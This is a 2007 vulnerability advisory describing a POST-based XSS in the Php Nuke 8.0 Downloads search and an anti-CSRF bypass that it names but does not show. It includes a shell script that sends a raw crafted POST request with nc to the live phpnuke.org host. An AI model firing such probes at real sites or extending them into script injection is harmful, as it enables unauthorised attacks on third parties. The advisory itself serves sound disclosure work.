|
Php Nuke POST XSS on steroids
Name Php Nuke POST XSS on steroids
Systems Affected PHP >=4.0.7 <=5.2.1, GLOBALS OFF, Php Nuke 8.0 and
others (partially verified)
Severity Medium
Vendor http://php nuke.org/
Advisory http://www.ush.it/2007/03/09/php-nuke-wild-post-xss/
Authors Francesco `ascii` Ongaro (ascii@ush.it)
Stefano `wisec` di Paola (stefano.dipaola@wisec.it)
Date 20070307
I. BACKGROUND
Php Nuke is a CMS written in PHP. This advisory is just an example on
how to exploit an XSS on platforms that use anti CSRF techniques with
the import_request_variables() bypass.
II. DESCRIPTION
An XSS vulnerability exists in the handling of the query post variable
in the Search function of the Downloads module. This is exploitable in
special conditions; you need:
- PHP >=4.0.7 <=5.2.1 to use the import_request_variables() trick
- register_globals off (doesn't work with globals on)
- Php Nuke 8 and others
III. ANALYSIS
Php Nuke 8.0 is vulnerable to an XSS on _POST, you can verify this using
the provided testsuite.
--- >8 --- >8 --- >8 --- >8 --- testsuite.sh --- >8 --- >8 --- >8 --- >8
#!/bin/bash
cat > REQ << TOKEN
POST /modules.php?name=Downloads&d_op=search&query= HTTP/1.1
Host: www.phpnuke.org
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2)
Gecko/20070220 Firefox/2.0.0.2
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://www.phpnuke.org/modules.php?name=Downloads
Cookie: lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
query=token<>token
TOKEN
cat REQ | nc www.phpnuke.org 80 -vvv
--- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8
$ ./testcase | grep "token<>token"
DNS fwd/rev mismatch: www.phpnuke.org != ev1s-67-15-16-43.ev1servers.net
www.phpnuke.org [67.15.16.43] 80 (http) open